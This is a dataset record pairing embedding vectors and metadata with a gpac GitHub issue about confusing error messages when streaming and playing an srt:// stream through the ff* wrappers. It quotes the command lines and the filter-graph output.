0.030357185751199722, -0.002096193842589855, -0.00276088435202837, -0.002472433727234602, 0.03414108604192734, -0.015307589434087276, -0.008055116981267929, -0.006525075063109398, -0.003002752782776952, -0.005625682417303324, -0.013329642824828625, 0.002753717824816704, -0.007209473289549351, 0.01107937004417181, -0.016224898397922516, 0.0022054824512451887, 0.009846735745668411, 0.013931626453995705, 0.01949281059205532, -0.006485659629106522, -0.005718846805393696, 0.0027125105261802673, 0.002436601324006915, 0.002105152001604438, 0.0018543252954259515, -0.003902145428583026, 0.005425021052360535, -0.006994479335844517, 0.0056937639601528645, 0.012147174216806889, 0.01612456701695919, -0.000665586325339973, -0.016110233962535858, 0.001931364880874753, 0.017758524045348167, -0.00958874262869358, -0.005224360153079033, 0.018202845007181168, 0.0016285813180729747, -0.0038483967073261738, -0.008463606238365173, 0.009889734908938408, 0.011136701330542564, 0.01783018931746483, 0.0015425836900249124, 0.03110249899327755, 0.019894132390618324, -0.003482906613498926, -0.0012675701873376966, 0.01910582184791565, -0.012906820513308048, -0.0004447693354450166, 0.021126767620444298, 0.012089842930436134, 0.00017165945610031486, 0.00370506732724607, -0.025870973244309425, 0.015207258984446526, -0.009595909155905247, 0.022932717576622963, -0.016869880259037018, 0.018045183271169662, 0.022072741761803627, -0.008069450035691261, 0.008606935851275921, 0.001639330992475152, -0.01409645564854145, 0.010642214678227901, -0.004292718134820461, -0.028651565313339233, -0.007338469848036766, 0.008549603633582592, 0.0391002856194973, 0.00533185712993145, -0.020367121323943138, -0.011946513317525387, 0.013401307165622711, 0.0054178545251488686, -0.030443184077739716, 0.011215532198548317, 0.008277278393507004, -0.001580207608640194, -0.011186867021024227, -0.017099207267165184, -0.0024849751498550177, 0.003826897358521819, -0.023778362199664116, 0.0024993079714477062, -0.00993990059942007, -0.00668273726478219, -0.008012118749320507, -0.009087089449167252, 0.0006145251682028174, -0.03098783642053604, -0.00427121901884675, -0.00828444492071867, -0.0035133641213178635, 0.02018079161643982, 0.004339300096035004, -0.016110233962535858, 0.0024634755682200193, 0.012376501224935055, -0.00990406796336174, 0.010814210399985313, 0.015364921651780605, 0.01916315220296383, -0.011473525315523148, 0.006718569900840521, 0.005159861873835325, 0.005055947694927454, -0.0007372510735876858, 0.01897682435810566, -0.03712233901023865, -0.015207258984446526, -0.020080462098121643, 0.002658762037754059, 0.02195807732641697, -0.00022619185619987547, 0.007026728242635727, -0.006116585806012154, -0.02475300244987011, -0.003819730831310153, -0.023534702137112617, 0.009861068800091743, 0.012340669520199299, 0.03422708064317703, -0.008413441479206085, -0.014612441882491112, -0.0029328796081244946, 0.0031514570582658052, 0.002574556041508913, -0.00936658214777708, 0.006170334760099649, 0.01416095346212387, 0.007890288718044758, -0.011437693610787392, 0.01694154553115368, -0.03009919263422489, -0.005686597432941198, -0.007897455245256424, 0.003963060211390257, 0.029697870835661888, -0.010104728862643242, 0.002527973847463727, 0.010291057638823986, 0.002089027315378189, 0.02182908169925213, 0.002622929634526372, 0.004231803119182587, -0.01390296034514904, 0.012906820513308048, 0.007320553530007601, 0.005048781167715788, 0.0006517012952826917, 0.0004935909528285265, 0.007015978451818228, -0.016210565343499184, -0.014648273587226868, -0.02545531839132309, 0.003748066257685423, -0.0382116436958313, 0.00948841217905283, -0.008485105820000172, -0.005124029237776995, -0.03924361616373062, -0.004772872198373079, 0.01695587858557701, -0.010549050755798817, 0.01695587858557701, -0.0005912341293878853, 0.01012622844427824, -0.000454175315098837, 0.012835156172513962, 0.013322476297616959, -0.0041995542123913765, 0.00816261488944292, -0.0066970703192055225, 0.009173087775707245, 0.00904409121721983, 0.005425021052360535, 0.00389497890137136, 0.008499438874423504, 0.017615193501114845, 0.012154340744018555, 0.011710019782185555, -0.0003692973987199366, -0.002812841208651662, -0.01618189923465252, -0.006120169069617987, -0.019693471491336823, -0.002069319598376751, -0.01523592509329319, -0.031073832884430885, 0.019535809755325317, 0.010484552010893822, 0.013057316653430462, 0.008356109261512756, -0.009194586426019669, 0.008671434596180916, 0.005310357548296452, -0.005292441230267286, -0.002164275385439396, -0.003486489877104759, 0.008700099773705006, -0.004475463181734085, 0.0014870434533804655, 0.04907601699233055, -0.008062283508479595, 0.009345082566142082, 0.02832190692424774, -0.03339577093720436, 0.010613548569381237, -0.01929214969277382, 0.015178592875599861, -0.012863821350038052, -0.011925013735890388, -0.0008908823365345597, 0.0035653209779411554, -0.0037301499396562576, 0.01164552103728056, -0.014010457322001457, -0.003998892847448587, 0.002615763107314706, -0.01738586649298668, -0.03184781223535538, -0.024165352806448936, 0.0029830450657755136, 0.0031138332560658455, 0.006102253217250109, 0.004955617245286703, -0.0035420299973338842, -0.010183560661971569, -0.0012738408986479044, 0.015293256379663944, -0.023979023098945618, -0.008721599355340004, 0.02089744061231613, -0.010549050755798817, 0.004565044306218624, 0.0015784159768372774, -0.008427773602306843, 0.0026748867239803076, 0.0025190156884491444, 0.03600436821579933, -0.0037659823428839445, -0.020668111741542816, 0.004959200508892536, -0.009832402691245079, -0.00638174545019865, 0.008915094658732414, -0.02913888543844223, 0.03181914612650871, -0.00020670800586231053, 0.01923481747508049, 0.013093149289488792, 0.004887535702437162, 0.003531280206516385, 0.018905159085989, -0.012462499551475048, 0.012340669520199299, 0.005776178557425737, 0.003507989225909114, -0.009337916038930416, 0.0033700347412377596, -0.00847077276557684, 0.009674740955233574, 0.0016733717638999224, -0.022574394941329956, -0.0011027412256225944, -0.0003236111078877002, -0.028522567823529243, 0.02710360661149025, 0.029611872509121895, 0.024924999102950096, 0.006385328713804483, 0.014375947415828705, -0.01034838892519474, -0.013293810188770294, -0.003909311722964048, -0.003278661984950304, 0.023391373455524445, -0.0015139176975935698, 0.007603629492223263, -0.00018621636263560504, -0.012003844603896141, -0.014891933649778366, -0.010620715096592903, -0.011860514990985394, -0.0034470742102712393, -0.0039164782501757145, 0.00035406864481046796, -0.004833787214010954, -0.01638256013393402, -0.005475186742842197, 0.0035850289277732372, 0.03766699135303497, 0.010484552010893822, 0.015121261589229107, -0.0033951173536479473, 0.0006431911024264991, -0.0001966301497304812, -0.010477385483682156, 0.018948158249258995, -0.0024598923046141863, -0.017557863146066666, 0.0017665359191596508, 0.017973517999053, 0.0013535679318010807, -0.010398554615676403, 0.015350588597357273, -0.0017513071652501822, 0.029052887111902237, 0.008578269742429256, 0.000672304886393249, -0.03471440076828003, 0.0182171780616045, 0.006704236846417189, 0.01783018931746483, 0.017428865656256676, -0.009947066195309162, 0.0033431602641940117, 0.024867666885256767, 0.012964152731001377, 0.0089867589995265, 0.008671434596180916, 0.0006763360579498112, 0.0033825759310275316, -0.01967913843691349, 0.0025136410258710384, -0.010154894553124905, 0.026960277929902077, 0.01402479037642479, -0.007395801600068808, -0.00032585064764134586, 0.012462499551475048, -0.021915078163146973, -0.00895092636346817, -0.016554556787014008, 0.010914540849626064, 0.004658208228647709, -0.018303176388144493, 0.013508804142475128, 0.0034452825784683228, 0.01725687086582184, 0.012261837720870972, 0.00385556323453784, -0.007804290857166052, 0.01575191132724285, -0.00857110321521759, -0.012190173380076885, 0.00427121901884675, 0.021040769293904305, -0.02723260223865509, -0.008750265464186668, 0.007610796019434929, -0.013014317490160465, 0.0222160704433918, -0.004780038725584745, 0.023534702137112617, -0.0125413304194808, -0.013100315816700459, 0.009180254302918911, 0.0059768399223685265, 0.013322476297616959, -0.00771112646907568, 0.017887519672513008, -0.01047021895647049, -0.0063029141165316105, -0.0005589849897660315, 0.009975732304155827, -0.003289411775767803, -0.0009468704229220748, 0.0018193887080997229, -0.0060843368992209435, 0.03110249899327755, -0.00790462177246809, -0.01148785836994648, -0.010047397576272488, -0.007256055250763893, -0.009337916038930416, 0.021986743435263634, 0.012140007689595222, 0.019148819148540497, -0.0047012073919177055, 0.024982329457998276, 0.012835156172513962, 0.01936381496489048, 0.019693471491336823, 0.003658485133200884, 0.003328827442601323, 0.018116846680641174, 0.0026480122469365597, -0.004966367036104202, 0.00910858903080225, 0.025283321738243103, -0.002259231172502041, 0.006396078504621983, -0.010778377763926983, 0.012749157845973969, 0.0013159438967704773, 0.014132287353277206, 0.029812533408403397, -0.007689627353101969, 0.026644952595233917, 0.015909573063254356, 0.012075509876012802, -0.0051992773078382015, -0.00802645180374384, 0.008778931573033333, -0.015479585155844688 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
For example I can start and playback an srt:// stream, but these errors are confusion: ``` $ gpac avgen c=avc c=aac -o srt://127.0.0.1:9000::ffmt=mpegts:mode=listener -graph [FFMux] Fail to write packet to srt://127.0.0.1:9000: error Input/output error - aborting <= HERE session last process error I/O Error <= HERE Unknown argument ":9000" set but not used by any filter - no matching argument found <= HERE Filters connected: "avgen" (js=/home/rbouqueau/works/gpac/gpac/share/scripts/jsf/avgen/init.js) (idx=1) -(PID audio) resample (dyn_idx=6) --(PID audio) ffenc "ffenc:aac" (c=aac) (idx=3) ---(PID audio) ffmx (dst=srt://127.0.0.1:9000::ffmt=mpegts:mode=listener) (idx=4) -(PID video) ffenc "ffenc:libx264" (c=avc) (idx=2) --(PID video) rfnalu (dyn_idx=5) ---(PID video) ffmx (dst=srt://127.0.0.1:9000::ffmt=mpegts:mode=listener) (idx=4) [aac] 2 frames left in the queue on closin ``` and (playback): ``` $ gpac -play srt://127.0.0.1:9000 Type 'h' in window for command list Filter ffdec:9000 option set but not use <= HERE ```
Weird error messages when using ff* wrappers
https://api.github.com/repos/gpac/gpac/issues/2812/comments
3
2024-04-26T18:44:49
2024-05-28T15:35:15Z
https://github.com/gpac/gpac/issues/2812
2,266,325,410
2,812
false
This is a GitHub Issue repo:gpac owner:gpac Title : Weird error messages when using ff* wrappers Issue date: --- start body --- For example I can start and playback an srt:// stream, but these errors are confusion: ``` $ gpac avgen c=avc c=aac -o srt://127.0.0.1:9000::ffmt=mpegts:mode=listener -graph [FFMux] Fail to write packet to srt://127.0.0.1:9000: error Input/output error - aborting <= HERE session last process error I/O Error <= HERE Unknown argument ":9000" set but not used by any filter - no matching argument found <= HERE Filters connected: "avgen" (js=/home/rbouqueau/works/gpac/gpac/share/scripts/jsf/avgen/init.js) (idx=1) -(PID audio) resample (dyn_idx=6) --(PID audio) ffenc "ffenc:aac" (c=aac) (idx=3) ---(PID audio) ffmx (dst=srt://127.0.0.1:9000::ffmt=mpegts:mode=listener) (idx=4) -(PID video) ffenc "ffenc:libx264" (c=avc) (idx=2) --(PID video) rfnalu (dyn_idx=5) ---(PID video) ffmx (dst=srt://127.0.0.1:9000::ffmt=mpegts:mode=listener) (idx=4) [aac] 2 frames left in the queue on closin ``` and (playback): ``` $ gpac -play srt://127.0.0.1:9000 Type 'h' in window for command list Filter ffdec:9000 option set but not use <= HERE ``` --- end body ---
1,273
[ -0.03345916047692299, 0.04020024091005325, -0.014051616191864014, 0.006310144905000925, -0.008018501102924347, 0.005105830729007721, -0.031519945710897446, 0.03444415703415871, -0.049034442752599716, 0.01542137935757637, -0.01296657882630825, 0.025594564154744148, 0.007056589238345623, 0.0022681893315166235, -0.006660281214863062, 0.00842635240405798, -0.017776140943169594, 0.012381736189126968, -0.00548290042206645, 0.011658377945423126, 0.010134709067642689, -0.0021854648366570473, -0.022578006610274315, 0.019053559750318527, -0.026856593787670135, -0.010327091440558434, -0.03749149665236473, 0.017329813912510872, -0.03533681109547615, -0.0074605923146009445, 0.022578006610274315, 0.016529502347111702, 0.011519862338900566, -0.004721065983176231, 0.03429025039076805, 0.0219316016882658, 0.017422156408429146, 0.05494443327188492, 0.031012054532766342, 0.007756861392408609, -0.021746914833784103, -0.03666040301322937, -0.05017334967851639, 0.03379775211215019, -0.053282249718904495, 0.0304579921066761, -0.005040420684963465, 0.006079286336898804, -0.027010498568415642, -0.0490960069000721, 0.014067006297409534, -0.019653793424367905, -0.01740676537156105, -0.03444415703415871, -0.021362150087952614, -0.03179697319865227, 0.0525742806494236, -0.04029258340597153, -0.04577163606882095, 0.0022951229475438595, -0.014359427616000175, -0.004967315588146448, -0.012327868491411209, 0.008018501102924347, -0.0018863101722672582, 0.01869957707822323, -0.029334479942917824, 0.03579853102564812, 0.004586398135870695, 0.016098564490675926, -0.0022720370907336473, 0.0008589877397753298, 0.001502507133409381, 0.022747304290533066, 0.004659503698348999, -0.0217623058706522, 0.04223180189728737, 0.01991543360054493, -0.015544503927230835, -0.0023162849247455597, -0.042631953954696655, -0.01869957707822323, -0.0248865969479084, 0.012258610688149929, 0.011912322603166103, -0.008064673282206059, -0.06005411222577095, -0.06340926140546799, 0.006879596970975399, 0.006337078753858805, 0.012035447172820568, 0.03727602958679199, 0.011550643481314182, -0.015121262520551682, 0.026748858392238617, -0.0034705798607319593, 0.006487137172371149, -0.013789976015686989, -0.017252860590815544, -0.030873538926243782, -0.024394096806645393, -0.023870816454291344, -0.027518387883901596, -0.00990385003387928, 0.005694521125406027, 0.006056200247257948, 0.008988109417259693, -0.015344426035881042, 0.011581424623727798, 0.13001976907253265, 0.02951916679739952, 0.007475982885807753, 0.0025683059357106686, -0.01469032559543848, -0.01060412172228098, -0.0004181913973297924, -0.010657988488674164, -0.016883485019207, 0.005548310466110706, 0.0030992815736681223, -0.004378625191748142, 0.008210883475840092, -0.018745748326182365, 0.02043871395289898, -0.026025500148534775, 0.03210478648543358, -0.0017574138473719358, 0.005452119279652834, -0.029288306832313538, -0.007949243299663067, -0.03070424310863018, -0.029965493828058243, 0.004243957344442606, 0.013851538300514221, -0.0025606106501072645, -0.0217623058706522, -0.0727667436003685, 0.010488692671060562, -0.0008960213745012879, -0.027795419096946716, -0.03401321917772293, -0.03595243766903877, 0.03727602958679199, 0.0038880498614162207, -0.007352857850492001, -0.02179308608174324, 0.021423712372779846, -0.01521360594779253, -0.04278586059808731, 0.0014611448859795928, -0.02502511255443096, -0.0358600914478302, 0.02573307976126671, -0.02694893628358841, 0.031150570139288902, -0.02527136169373989, 0.03127369284629822, -0.0052328030578792095, 0.02270113117992878, -0.034967437386512756, -0.03666040301322937, -0.04284742474555969, 0.004621027037501335, -0.013128180056810379, -0.01001158356666565, -0.0019796155393123627, 0.01441329438239336, 0.006367859896272421, 0.005617568269371986, 0.019345982000231743, -0.025456048548221588, -0.01095041073858738, 0.018884263932704926, -0.0008060825639404356, -0.04623335599899292, -0.03210478648543358, 0.016144737601280212, 0.047957103699445724, -0.037614621222019196, 0.00417854730039835, -0.03392087668180466, 0.010203965939581394, 0.003572542453184724, -0.02854955941438675, 0.007691451348364353, 0.0055444627068936825, 0.021285196766257286, -0.046110231429338455, 0.05863817781209946, -0.038445714861154556, 0.025810033082962036, 0.02068496309220791, -0.011081230826675892, -0.019176684319972992, 0.009234358556568623, 0.010465606115758419, -0.04675663635134697, -0.013728412799537182, 0.0018978531006723642, -0.007841509766876698, -0.0034705798607319593, -0.04198554903268814, -0.00737979169934988, 0.013643764890730381, -0.030765805393457413, -0.00305503373965621, -0.021192852407693863, 0.04020024091005325, 0.009957716800272465, -0.025394486263394356, 0.002714516595005989, -0.05629880726337433, 0.034936655312776566, -0.011158183217048645, -0.0013437916059046984, 0.004420949146151543, -0.012697243131697178, 0.04220101982355118, 0.00018540860037319362, -0.025086674839258194, 0.06531769782304764, -0.029965493828058243, -0.0008262827177532017, 0.006471746135503054, -0.0428166426718235, 0.008172407746315002, -0.011165878735482693, -0.02336292713880539, -0.017191298305988312, 0.019576840102672577, -0.0038149442989379168, 0.029719244688749313, -0.017699187621474266, -0.00629090704023838, -0.025194408372044563, 0.009742248803377151, -0.03324368968605995, 0.008180102333426476, -0.016237080097198486, 0.00871877372264862, -0.0013899633195251226, 0.026379484683275223, -0.006025419104844332, 0.014644153416156769, -0.01539059728384018, 0.03339759632945061, 0.002641411265358329, 0.002429790562018752, -0.030750414356589317, -0.035213686525821686, -0.021993163973093033, 0.00618702033534646, 0.004228566773235798, -0.0018006999744102359, -0.03373619168996811, 0.01991543360054493, -0.0034205603878945112, -0.004767237696796656, 0.024671128019690514, -0.037553057074546814, -0.010342481546103954, 0.019207466393709183, -0.007599107455462217, -0.015113567002117634, 0.008803421631455421, -0.04974241182208061, -0.012704938650131226, -0.030073227360844612, 0.002681811572983861, 0.011681463569402695, 0.0019642249681055546, -0.00727590499445796, -0.059900205582380295, 0.008364790119230747, -0.007445201743394136, -0.016591064631938934, 0.03042721189558506, -0.013128180056810379, 0.02540987730026245, -0.005125069059431553, -0.04207789525389671, 0.010750332847237587, -0.009996193461120129, 0.006698757875710726, -0.03056572750210762, 0.02287042886018753, -0.004697979893535376, 0.0028337938711047173, -0.04817257076501846, 0.02485581487417221, 0.02399394102394581, 0.02328597381711006, -0.04724913462996483, 0.029580729082226753, 0.009796115569770336, 0.013043531216681004, -0.006202410906553268, 0.012158572673797607, 0.03459806367754936, 0.015852315351366997, -0.017068173736333847, 0.04253961145877838, 0.010550254955887794, -0.04946538060903549, -0.047156792134046555, -0.00181031902320683, -0.00181031902320683, 0.049034442752599716, 0.04546382650732994, -0.008526391349732876, 0.03290509805083275, -0.02771846577525139, -0.013251304626464844, 0.00028785227914340794, 0.023178240284323692, -0.0006810339400544763, -0.007325924467295408, -0.03715290129184723, -0.028918933123350143, -0.01629864238202572, 0.013120484538376331, 0.008726469241082668, -0.07430580258369446, -0.00811084546148777, 0.030765805393457413, -0.026887373998761177, -0.015090481378138065, 0.011666073463857174, -0.054082561284303665, -0.018930435180664062, -0.00677955849096179, 0.008795727044343948, 0.006079286336898804, -0.038168683648109436, 0.004886514972895384, -0.06605644524097443, -0.018607232719659805, -0.005455967038869858, 0.050111785531044006, -0.03930758684873581, -0.027441436424851418, 0.005444423761218786, -0.0047441516071558, -0.015536808408796787, 0.011335175484418869, 0.005825341213494539, -0.014959661290049553, -0.008064673282206059, 0.02927291765809059, -0.01505970023572445, 0.000921031110920012, 0.04832647740840912, 0.012358649633824825, 0.016129346564412117, 0.01820707693696022, -0.018422545865178108, -0.016067784279584885, -0.037060558795928955, -0.0017189374193549156, 0.0034782751463353634, 0.006456355564296246, -0.013566811569035053, 0.027410654351115227, 0.028087841346859932, 0.01552911289036274, -0.021593008190393448, -0.034967437386512756, -0.012366345152258873, 0.021593008190393448, -0.039953991770744324, -0.02005394920706749, -0.0014784593367949128, -0.06525613367557526, 0.024594174697995186, 0.0022662654519081116, 0.02036176063120365, 0.028888151049613953, -0.018884263932704926, -0.03419790789484978, 0.0062178014777600765, -0.05503677576780319, -0.003928449936211109, 0.008164712227880955, -0.038168683648109436, 0.005352080333977938, 0.03906133770942688, -0.006541003938764334, 0.011604510247707367, -0.03792243450880051, -0.04140070825815201, -0.01712973602116108, 0.02248566411435604, -0.029119011014699936, -0.045340701937675476, -0.04774163290858269, 0.02568690851330757, -0.025302141904830933, -0.05891520902514458, 0.007210494950413704, -0.0017881951062008739, -0.00024540789308957756, 0.010050060227513313, 0.011342870071530342, 0.03779930621385574, -0.03715290129184723, 0.03610634058713913, -0.005771473981440067, -0.020931212231516838, 0.03262806683778763, 0.02040793187916279, -0.0021835409570485353, -0.041585393249988556, 0.004205480683594942, -0.0025490678381174803, 0.005348232574760914, 0.049557723104953766, 0.0005588710773736238, 0.009095842950046062, -0.012227829545736313, 0.009519084356725216, -0.011566034518182278, -0.007175866048783064, -0.010203965939581394, 0.002071959199383855, 0.06630269438028336, 0.02774924784898758, -0.002726059639826417, 0.03884586691856384, 0.008734163828194141, -0.0241940189152956, 0.02353222481906414, -0.02444026991724968, 0.010842676274478436, -0.01563684642314911, 0.016591064631938934, -0.03042721189558506, -0.051989439874887466, -0.031704630702733994, -0.019730746746063232, -0.009126624092459679, -0.04564851149916649, 0.014197826385498047, 0.010319395922124386, 0.04681819677352905, 0.02921135537326336, -0.03268963098526001, -0.055406153202056885, -0.023101286962628365, 0.023178240284323692, -0.03364384546875954, 0.022747304290533066, 0.029811587184667587, 0.012666461989283562, 0.0025625345297157764, -0.030381040647625923, -0.005744540598243475, 0.011542947962880135, -0.016837313771247864, 0.048203352838754654, -0.0037418389692902565, 0.0037899347953498363, -0.0012995435390621424, -0.001499621313996613, -0.029996275901794434, 0.01994621381163597, 0.012389430776238441, -0.018991997465491295, -0.014890403486788273, 0.01187384594231844, -0.014582591131329536, -0.008172407746315002, 0.012258610688149929, -0.005059659015387297, -0.0010513701708987355, -0.008064673282206059, 0.02245488204061985, -0.01580614410340786, -0.009280530735850334, 0.03425947204232216, -0.043432265520095825, -0.003253187518566847, -0.05491365119814873, 0.04066196084022522, -0.008449438028037548, -0.02711823396384716, -0.01622169092297554, -0.0025105911772698164, -0.003260882804170251, -0.01729903183877468, -0.02143910340964794, 0.01939215324819088, 0.028503386303782463, 0.013697631657123566, -0.007075827103108168, -0.004894210025668144, -0.0025548392441123724, -0.0025221342220902443, -0.0003597552131395787, 0.006483289413154125, -0.004182395059615374, 0.007341315038502216, 0.011727635748684406, 0.016929658129811287, 0.008387875743210316, 0.012450993992388248, 0.004667198751121759, -0.01423630304634571, 0.05694521218538284, -0.037891652435064316, -0.03459806367754936, -0.032012443989515305, 0.014667239971458912, -0.002760688541457057, -0.0445711724460125, -0.02214707061648369, -0.01194310374557972, -0.0009585456573404372, -0.018130123615264893, 0.010981191881000996, -0.005132764577865601, -0.02416323870420456, -0.00407466059550643, -0.018545670434832573, 0.03296666219830513, -0.005732997786253691, 0.005348232574760914, 0.01754528097808361, -0.02196238376200199, 0.003043490694835782, -0.020792696624994278, -0.026194797828793526, -0.009272835217416286, -0.014036225154995918, 0.03312056511640549, -0.018714966252446175, 0.026271751150488853, -0.004182395059615374, 0.01796082779765129, 0.008957328274846077, -0.0007440391927957535, -0.04229336231946945, 0.04540226235985756, -0.009226663038134575, 0.006764167919754982, -0.01081189513206482, 0.023716911673545837, -0.013612983748316765, 0.029919322580099106, -0.02771846577525139, -0.010342481546103954, -0.00990385003387928, 0.0008681258768774569, 0.0025894681457430124, 0.030027056112885475, -0.001234133611433208, 0.0011571805225685239, -0.002397085539996624, 0.027102842926979065, -0.007579869590699673, 0.0040092505514621735, -0.016006221994757652, 0.06214723363518715, 0.01660645566880703, -0.01737598516047001, -0.0010080841602757573, 0.006444812752306461, 0.002114283386617899, -0.009819201193749905, -0.061223797500133514, -0.010858066380023956, 0.00018889554485213012, 0.0006916149868629873, 0.012012361548841, 0.008395571261644363, 0.010180880315601826, -0.01608317531645298, 0.047403041273355484, -0.01416704524308443, 0.01289732102304697, -0.009349788539111614, 0.040538836270570755, -0.038907431066036224, 0.014975051395595074, -0.00370721030049026, -0.004782628268003464, 0.008280141279101372, 0.010196271352469921, 0.002624096814543009, -0.023624567314982414, -0.012766500934958458, -0.013982358388602734, 0.0014207445783540606, -0.004086203873157501, -0.018822701647877693, 0.016683407127857208, -0.008734163828194141, 0.0012014285894110799, 0.016945047304034233, 0.030658069998025894, 0.006837273016571999, -0.010711856186389923, 0.04081586375832558, -0.020623400807380676, -0.024394096806645393, -0.026487218216061592, -0.0029723092447966337, 0.006887292489409447, -0.007214342709630728, -0.04512523114681244, 0.01928441971540451, -0.003333988133817911, 0.035459935665130615, 0.06778018921613693, -0.01682192273437977, -0.006160086952149868, -0.00023170064378064126, -0.00593692297115922, 0.013066617771983147, -0.0019055483862757683, 0.030858147889375687, 0.01342060137540102, -0.03952305391430855, 0.04463273286819458, -0.035767748951911926, 0.012035447172820568, 0.05737615004181862, 0.022331757470965385, -0.049280695617198944, -0.017945436760783195, -0.010419434867799282, -0.028241746127605438, 0.023301364853978157, -0.02311667799949646, -0.016760360449552536, -0.004759542178362608, 0.002976156771183014, 0.03042721189558506, -0.006644890643656254, -0.021054336801171303, -0.011442909017205238, -0.025594564154744148, -0.006421727128326893, -0.0269797183573246, 0.009049671702086926, -0.015960050746798515, 0.0010552178137004375, -0.005752236116677523, 0.02190082147717476, -0.010804199613630772, 0.010796504095196724, -0.0049211434088647366, -0.03210478648543358, 0.009811505675315857, 0.015159739181399345, 0.019484497606754303, -0.023178240284323692, 0.03425947204232216, 0.01071955170482397, 0.001777614001184702, -0.01187384594231844, -0.0010253986110910773, 0.002098892815411091, -0.004105441737920046, -0.030550336465239525, -0.0006690100417472422, 0.02471729926764965, 0.007795337587594986, -0.0077722519636154175, -0.021362150087952614, 0.030334867537021637, 0.01803778111934662, -0.0207157451659441, 0.032566506415605545, -0.038384150713682175, -0.005594482179731131, -0.0018891958752647042, -0.00481340941041708, -0.014767278917133808, 0.018653403967618942, -0.020207853987812996, -0.02220863290131092, -0.007879986427724361, -0.016883485019207, -0.0015900410944595933, -0.012712634168565273, 0.02510206401348114, 0.0040246411226689816, 0.020069340243935585, -0.04035414755344391, -0.02708745189011097, 0.019976995885372162, 0.004894210025668144, 0.017068173736333847, 0.05611411854624748, -0.02360917627811432, -0.0043555391021072865, 0.003612942760810256, -0.019623011350631714, -0.009649904444813728, -0.0017381756333634257, -0.03296666219830513, 0.016652626916766167, -0.019961604848504066, -0.03268963098526001, 0.01817629672586918, 0.011150487698614597, -0.0007834776188246906, 0.013374429196119308, 0.003066576551645994, 0.026394875720143318, 0.006044657435268164, -0.0035129040479660034, -0.01702200062572956, 0.013251304626464844, -0.012204743921756744, 0.01482884120196104, 0.015821535140275955, -0.008326313458383083, -0.02444026991724968, 0.007210494950413704, -0.0058368840254843235, -0.021085118874907494, -0.014921184629201889, -0.014959661290049553, -0.020561838522553444, -0.003049262100830674, 0.0001403189671691507, 0.0301194004714489, -0.010619512759149075, 0.002774155233055353, -0.0005449233576655388, -0.025810033082962036, 0.009257444180548191, 0.01597543992102146, -0.03327447175979614, -0.006410183850675821, -0.019299808889627457, 0.014836535789072514, 0.017037391662597656, 0.00720664719119668, -0.00910353846848011, 0.006333230994641781, -0.015113567002117634, -0.02471729926764965, 0.004574855323880911, -0.03779930621385574, -0.008133931085467339, 0.029057448729872704, -0.012527946382761002, 0.02190082147717476, 0.010380958206951618, 0.010250138118863106, 0.021331368014216423, -0.042908985167741776, -0.025825422257184982, 0.01030400488525629, 0.03490587696433067, -0.018930435180664062, -0.020515667274594307, -0.030904320999979973, 0.02063879184424877, 0.0010465605882927775, 0.0022162459790706635, 0.008726469241082668, 0.00668336683884263, 0.0029319089371711016, -0.010865761898458004, -0.018853481858968735, 0.008934241719543934, -0.007418267894536257, 0.001471725874580443, 0.024871205911040306, -0.02667190507054329, -0.015567589551210403, 0.024117067456245422, 0.0016410225071012974, -0.003982317168265581, -0.0009975031716749072, -0.029965493828058243, -0.019068950787186623, -0.024363316595554352, 0.0022104745730757713, -0.06408645212650299, 0.03195087984204292, 0.015590675175189972, -0.011381346732378006, 0.02656417153775692, 0.011789198033511639, -0.0028761180583387613, -0.007926157675683498, 0.017637625336647034, -0.00955756101757288, 0.025886984542012215, -0.03188931941986084, 0.0038034014869481325, -0.013951577246189117, -0.0010071222204715014, 0.023193631321191788, -0.016021613031625748, 0.015167433768510818, -0.003272425848990679, -0.0029376803431659937, -0.0012591432314366102, -0.03484431281685829, -0.011689159087836742, -0.019453715533018112, -0.02548683062195778, -0.007733775302767754, -0.030027056112885475, 0.038414932787418365, 0.0007786680362187326, 0.010134709067642689, 0.014282474294304848, 0.006941159721463919, -0.017976218834519386, -0.006748776882886887, 0.005017335060983896, -0.009449826553463936, -0.02670268714427948, 0.01619090884923935, -0.03067346103489399, 0.03164307028055191, 0.01380536612123251, -0.01336673367768526, 0.00009156203304883093, -0.03195087984204292, -0.011227441020309925, -0.0036937433760613203, 0.0052328030578792095, 0.00976533442735672, -0.018638014793395996, 0.007445201743394136, -0.03355150297284126, -0.002991547342389822, -0.04934225603938103, 0.036537278443574905, 0.019715355709195137, -0.002693354617804289, -0.020238636061549187, 0.020977385342121124, -0.018053170293569565, 0.0035840854980051517, -0.015575285069644451, -0.024424878880381584, -0.007410572841763496, -0.004417101386934519, 0.005967704113572836, -0.016975829377770424, 0.01564454287290573, 0.0008604305912740529, 0.002712592948228121, 0.02140832133591175, 0.036506496369838715, -0.0000687166175339371, -0.03749149665236473, -0.011650682426989079, -0.006244734860956669, 0.0028780417051166296, 0.006575632840394974, -0.015513722784817219, 0.023716911673545837, 0.010865761898458004, -0.019961604848504066, 0.005967704113572836, -0.015021223574876785, -0.0035359899047762156, 0.008418656885623932, -0.036814309656620026, 0.007576021831482649, -0.01065029390156269, -0.0358600914478302, -0.0410928949713707, -0.03179697319865227, -0.01164298690855503, -0.003657190827652812, 0.014582591131329536, -0.005740692839026451, -0.0040785083547234535, -0.025040501728653908, -0.0008488876628689468, -0.017114344984292984, 0.012974274344742298, -0.024763472378253937, -0.011296698823571205, -0.0037341436836868525, 0.0046133315190672874, 0.008911156095564365, -0.03315134719014168, -0.05174319073557854, 0.01712973602116108, 0.017006609588861465, -0.005225108005106449, -0.04961928725242615, -0.006602566223591566, -0.022931991145014763, 0.0281955748796463, -0.018607232719659805, -0.04697210341691971, -0.009149710647761822, -0.007248971611261368, -0.02102355659008026, -0.010142403654754162, 0.005486748181283474, -0.008634124882519245, 0.01848410815000534, -0.04229336231946945, -0.01267415750771761, 0.030658069998025894, 0.0026164015289396048, 0.00962681882083416, 0.007995415478944778, -0.018053170293569565, -0.0008315732120536268, -0.03499821946024895, -0.008064673282206059, 0.0034994371235370636, -0.019992386922240257, 0.011127402074635029, 0.02179308608174324, 0.0546674020588398, -0.01359759271144867, 0.015305949375033379, 0.0012591432314366102, 0.035767748951911926, 0.00425550015643239, -0.018006999045610428, 0.000593499920796603, -0.01522899605333805, 0.0016371748642995954, -0.004659503698348999, 0.007322076708078384, -0.03318212926387787, 0.0007599107921123505, -0.0039034404326230288, 0.009726857766509056, -0.0024798100348562002, -0.022762693464756012, -0.012073923833668232, -0.019453715533018112, -0.03158150613307953, -0.005548310466110706, 0.005352080333977938, 0.020838869735598564, -0.023055115714669228, -0.009272835217416286, 0.023763082921504974, 0.007325924467295408, 0.003570618573576212, 